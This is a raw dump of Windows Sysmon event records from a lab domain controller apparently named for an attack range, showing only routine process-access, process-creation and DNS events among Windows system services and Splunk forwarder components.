13:36:47.314{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EEF-6005-E500-00000000A301}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004267Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004266Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004265Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004264Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004263Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8EEF-6005-E500-00000000A301}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004262Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.314{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EEF-6005-E500-00000000A301}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004261Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:47.315{59A5CD1D-8EEF-6005-E500-00000000A301}748C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000004260Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:44.982{59A5CD1D-8EEB-6005-DF00-00000000A301}3544win-dc-495.attackrange.local010.0.1.14;C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe 10341000x80000000000000004304Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.815{59A5CD1D-8EF0-6005-E700-00000000A301}11961132C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004303Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EF0-6005-E700-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004302Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004301Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004300Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004299Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004298Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004297Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004296Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004295Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004294Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004293Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8EF0-6005-E700-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004292Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8EF0-6005-E700-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004291Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:48.659{59A5CD1D-8EF0-6005-E700-00000000A301}1196C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program 